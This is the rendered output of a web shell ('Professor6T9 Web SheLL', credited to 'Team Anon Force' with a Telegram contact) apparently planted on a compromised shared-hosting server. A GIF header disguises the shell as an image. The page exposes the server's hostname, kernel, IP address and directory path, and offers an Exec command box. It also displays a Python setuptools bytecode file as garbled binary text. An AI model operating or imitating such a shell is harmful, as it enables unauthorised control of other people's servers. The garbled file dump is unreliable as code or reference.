GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium22.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
68.65.122.106
/
opt
/
alt
/
python312
/
lib
/
python3.12
/
site-packages
/
setuptools
/
_distutils
/
__pycache__
[ HOME ]
Exec
Submit
File Name : errors.cpython-312.pyc
� t��e � � � d Z G d� de� Z G d� de� Z G d� de� Z G d� de� Z G d � d e� Z G d� de� Z G d � de� Z G d� de� Z G d� de� Z G d� de� Z G d� de� Z G d� de� Z G d� de� Z G d� de� Z G d� de� Z G d� d e� Z G d!� d"e� Z G d#� d$e� Z G d%� d&e� Zy')(a� distutils.errors Provides exceptions used by the Distutils modules. Note that Distutils modules may raise standard exceptions; in particular, SystemExit is usually raised for errors that are obviously the end-user's fault (eg. bad command-line arguments). This module is safe to use in "from ... import *" mode; it only exports symbols whose names start with "Distutils" and end with "Error".c � � e Zd ZdZy)�DistutilsErrorzThe root of all Distutils evil.N��__name__� __module__�__qualname__�__doc__� � ��/builddir/build/BUILDROOT/alt-python312-setuptools-69.0.2-1.el8.x86_64/opt/alt/python312/lib/python3.12/site-packages/setuptools/_distutils/errors.pyr r s � �)�r r c � � e Zd ZdZy)�DistutilsModuleErrorz�Unable to load an expected module, or to find an expected class within some module (in particular, command modules and classes).Nr r r r r r s � �H� r r c � � e Zd ZdZy)�DistutilsClassErrorz�Some command class (or possibly distribution class, if anyone feels a need to subclass Distribution) is found not to be holding up its end of the bargain, ie. implementing some part of the "command "interface.Nr r r r r r s � �� r r c � � e Zd ZdZy)�DistutilsGetoptErrorz7The option table provided to 'fancy_getopt()' is bogus.Nr r r r r r "